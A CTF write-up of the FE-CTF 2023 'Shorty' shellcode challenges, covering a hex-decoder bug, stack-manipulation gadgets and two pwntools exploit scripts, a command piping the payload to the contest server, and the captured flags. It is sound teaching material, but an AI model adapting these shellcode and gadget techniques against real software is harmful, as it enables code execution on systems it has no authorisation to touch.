Rating:

## Shorty (FE-CTF 2023)

(This write-up is also available [as a gist](https://gist.github.com/TethysSvensson/d1f623deeffb5442b8b3958d4538b097))

Shorty was a series of 4 shellcode challenges (called `level32` to `level35`) in FE-CTF 2023.

You are given an extremely small ELF32 binary (~400 bytes) and a hostname+port where it is running. All levels had basically the same binary, with only minor differences in how many registers were cleared and how.

The ELF headers for the binary are very simple: There is only a single `LOAD` header and it is marked as `RWE`. There is no `GNU_STACK` header. As a result the code, global variables and stack are all mapped with full read/write/execute permissions.

The code in the binaries works basically as follows:

```c
uint8_t flag_buffer[4092];
uint32_t shellcode;

void main() {
int32_t flag_fd = open("flag", O_RDONLY);
if (flag_fd < 0) { exit(0); }
read(flag_fd, flag_buffer, 127);
close(flag_fd);

prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);

while (1) {
uint8_t stackbuf[8];
if (read(0, stackbuf, 8) != 8) { exit(0); }

uint32_t decoded = 0;
for(uint32_t i = 0; i < 8; i++) {
uint32_t nibble = hex_decode(stackbuf[i]);
if (nibble == 0xffffffff) { exit(0); }
decoded = (decoded << 4) | nibble;
}
shellcode = bswap(decoded);
((void (*)()) &shellcode)();
}
}
```

To summarize the code: It loads the flag to a known address. Then it repeatedly reads 8 bytes from the user, hex-decodes them and executes them as shellcode.

Additionally:

- `level33` will clear `edi` after calling your shellcode.
- `level34` will clear `edi` before calling your shellcode.
- `level35` will clobber most registers using `rdrand` before calling your shellcode.

### Solving `level32`

During the CTF I solved `level32` first. A disassembly of my code is this:

```
# Set edi to 0x08048165, which is the return address
pop edi ; push edi ; ret

# Add small numbers to edi, until it equals 0x8049200
add edi, 0x7f ; ret
add edi, 0x7f ; ret
...
add edi, 0x3c ; ret

# Save pointer in ebp
mov ebp, edi ; ret

# Write shellcode one byte at a time
mov al, B0 ; stosb ; ret
mov al, B1 ; stosb ; ret
...
mov al, BN ; stosb ; ret

# Jump to shellcode
jmp ebp
```

This is the python script I used to generate the code:

```python
from pwn import *
context.arch = 'i386'

out = ''

cache = {}

def cached_asm(text):
if text not in cache:
code = asm(text)
assert len(code) <= 4
code = code + b'\xcc' * (4 - len(code))
cache[text] = code
return cache[text]

def add_asm(code):
global out
code = cached_asm(code)
out += enhex(code)

add_asm('pop edi ; push edi ; ret')

to_add = 0x8049200 - 0x8048165

while True:
if to_add > 127:
add_asm('add edi, 127; ret')
to_add -= 127
else:
add_asm(f'add edi, {to_add}; ret')
break

add_asm('mov ebp, edi ; ret')

packed_asm = asm(shellcraft.write(1, 0x8049000, 0x7f)) + asm(shellcraft.exit(0))

for b in packed_asm:
add_asm(f'mov al, {b} ; stosb ; ret')

add_asm('jmp ebp')

print(out)
```

This gave us the following flag: `flag{63e2969bf4960abaf288a17dbb9f6cba}`

### Solving `level35`

After solving `level32` I decided to skip `level33` and `level34` for now. I felt confident that I could create a solution that would work for all levels with only minor changes, so I went directly for `level35`.

I my plan as follows:

1. Write the shellcode to the stack one byte at a time
2. Jump to the shellcode
3. ????
4. PROFIT!!!

#### Insight: Bug in `hex_decode`

There is a bug in the `hex_decode` function. Normally it is supposed to return `0xffffffff` on invalid hex, which would cause the outer function to exit the program. However this is not quite how it actually works:

- For characters `'0'-'9'`, `'a'-'f'` and `'A'-'F'` the function will return the expected nibble in the range `0x0-0xf`.
- For invalid characters in the range `x00` to `/` the function will return `0xffffffff` as expected.
- However for all other characters, the function will return `0xff`.

This means that we are allowed to write (some) invalid hex without causing the program to exit! For example following string `c300?cccccccc` will correspond to the following shellcode:

```
# c300?
ret ; garbage
# cccccccc
int3 ; int3 ; int3 ; int3
```

The only gotcha to keep in mind when using this trick, is that the "nibble" `0xff` will pollute the next nibble, because it will be or'ed in with other values even if it is not strictly a nibble at all. So the code `c300?` from before will actually be interpreted as `c30fffff`, not `c300ffff` as expected.

#### Stack layout

The `main` function does not use the stack a lot. In fact after entering the main loop, it only ever uses a single stack for our read buffer. This buffer is located at `esp+4` to `esp+12`.

#### Gadget 1: Incrementing `esp` with side-effects

Our first gadget is `c2XXXX0Y`, where `XXXX` is an arbitrary unsigned 16-bit number written as a big-endian hex value. `Y` can be any byte, even non-hexadecimal.

This gadget corresponds to the instruction `retn XXXX`, which will return as normal but also increase `esp` by `X` bytes. This gadget also has the effect of leaving our `Y` byte on the stack.

#### Gadget 2: Decrementing `esp` without (too many) side-effects

Our next gadget is `616060c3` corresponding to `popa ; pusha ; pusha ; ret`. The first 3 instruction **mostly** has the effect of popping 32 bytes from the stack and then pushing them again twice in the same order. There is a small hiccup, because one of the registers pushed by `pusha` is `esp`, which means that those bytes will not be within our control. Luckily this fact does not really influence the rest of our exploit.

#### Gadget 3: Swapping stack values

Our next gadget is `619660c3` corresponding to `popa ; xchg eax, esi ; pusha ; ret`. It will swap two values on the stack (and clobber the stack value for `esp`).

#### Gadget 4: Decrementing a value on the stack

The next gadget is `614860c3` corresponding to `popa ; dec eax ; pusha ; ret`. Like before this will also clobber the stack value for `esp`.

#### Gadget 5: Jumping to the stack

The final gadget is pretty easy: `6161ffe4` corresponding to `popa ; popa ; jmp esp`.

#### Putting it together

These gadgets are enough to put our shellcode on the stack! For bytes of value `'0'` or greater we can use the hex-decoder bug and put them on the stack using this sequence:

```
# c208000X
# This has the net effect of increasing esp 8 which moves where the stack buffer is located.
# This means that our X gets to stay on the stack.
retn 8

# 619660c3
# After the popa, our saved X byte will be in the most significant byte of esi. We move it to eax instead since eax is the first register to be pushed
popa ; xchg eax, esi ; pusha ; ret

# 616060c3
# Moves esp down by 32
popa ; pusha ; pusha ; ret

# c2170000
# Moves esp up by 23
retn 23
```

The net effect of these four gadgets is to decrease `esp` by 1 and put a single byte onto the stack.

For bytes in the range `\x00` to `/` we have to do something a bit more complicated, since we cannot abuse the hex-decoder bug. We do this instead:

- Put a `'0'`
- Adjust `esp`
- Do `popa ; dec eax ; pusha ; ret` up to 0x30 times until the `0` has been changed to the desired value.
- Adjust `esp` again

This more general method could also be used for a hypothetical `level36`, which fixed the hex decoder bug.

#### Script

```python
from pwn import *
context.arch = 'i386'

out = b''

cache = {}

# cached_asm works the same as asm, but uses
# a cache to avoid calling the whole assembler
# toolchain too many times. It also pads the generated
# code to 4 bytes
def cached_asm(text):
if text not in cache:
code = asm(text)
assert len(code) <= 4
code = code + b'\x00' * (4 - len(code))
cache[text] = code
return cache[text]

def add_asm(code):
global out
code = cached_asm(code)
out += enhex(code).encode()

def add_asm_raw(code):
global out
assert len(code) <= 8
code = code + b'0' * (8 - len(code))
out += code

def move_stack_down32():
add_asm('popa ; pusha ; pusha ; ret')

def move_stack_up(n, extra=b'0'):
assert 0 <= n <= 0xffff
low = n & 0xff
high = n >> 8
add_asm_raw(f'c2{low:02x}{high:02x}0'.encode() + extra)

def move_stack_down32():
add_asm('popa ; pusha ; pusha ; ret')

def write_stack(s):
for c in reversed(s):
if c >= ord('0'):
move_stack_up(8, extra=bytes([c]))
add_asm('popa ; xchg eax, esi ; pusha ; ret')
move_stack_down32()
move_stack_up(32-8-1)
else:
move_stack_up(8, extra=b'0')
add_asm('popa ; xchg eax, esi ; pusha ; ret')
move_stack_down32()
move_stack_up(32+3)
for _ in range(ord('0') - c):
add_asm('popa ; dec eax ; pusha ; ret')
move_stack_down32()
move_stack_up(32-8-3-1)

real_shellcode = b''.join([
b'\x90' * 32,
asm('sub esp, 200'),
asm(shellcraft.write(1, 0x8049000, 0x7f)),
asm(shellcraft.exit(0))
])

write_stack(
real_shellcode
)

add_asm('popad ; popad ; jmp esp')

write('sploit', out)
```

This script will write a file called `sploit`. By doing `cat sploit | nc shorty-level35.hack.fe-ctf.dk 1337` you will get the flag for `level35`. The same file also works for the other levels.

#### Flags

```
level33: flag{ba5da5f4deba001d50813d834b9f83e8}
level34: flag{1e19eb80751f7aa8ee1510479c3cc449}
level35: flag{414e129fbbe624c37abb5ae270a12a16}
```

### Addendum: Shorty ultimate edition

I wanted to solve a harder version, so I decided to create one!

Though I do not have the source code for the original challenges, I managed to re-create a binary with more-or-less the same ELF headers and actual assembly code.

If you want to play around this harder version with yourself, run this in a shell:

```bash
$ (base64 -d | gunzip) > shorty-ultimate-edition <

Original writeup (https://gist.github.com/TethysSvensson/d1f623deeffb5442b8b3958d4538b097).